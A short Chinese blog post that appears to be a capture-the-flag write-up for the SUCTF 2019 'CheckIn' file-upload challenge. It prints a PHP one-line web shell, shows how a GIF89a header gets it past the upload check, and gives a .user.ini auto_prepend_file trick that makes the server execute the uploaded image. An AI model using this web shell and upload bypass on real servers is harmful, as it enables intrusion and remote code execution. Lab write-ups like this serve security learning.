登高的资格,永远不是别人的肩膀!|

Running_J

园龄:2年10个月粉丝:10关注:1

[SUCTF 2019]CheckIn

题目打开就是一个文件上传的题目试试上传一句话木马


发现检测了内容
之后换种写法绕过
<script language="php">eval($_REQUEST[8]);</script>

发现还检测后缀名,我们使用文件头GIF89a进行绕过


上传成功,我看了网上的方法,结合给的github地址,发现返回的是一个目录,里面有一个index.php,看到了有一个.user.ini的文件,结合网上的知识可以了解到这个是php的一个配置文件,让用户自定义设置,里面有一个配置auto_prepend_file的选项,和require()功能差不多,不过这个是在解析文件之后包含指定的文件。
详细解释前往这里

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

之后开始进行上传一个.user.ini的文件,内容为
GIF89a? auto_prepend_file=1.jpg
之后当加载了index.php的时候就会包含1.jpg,将它解析为php
使用蚁剑连接即可

本文作者:Running_J

本文链接:https://www.cnblogs.com/ArcherCY/p/16420582.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   Running_J  阅读(64)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起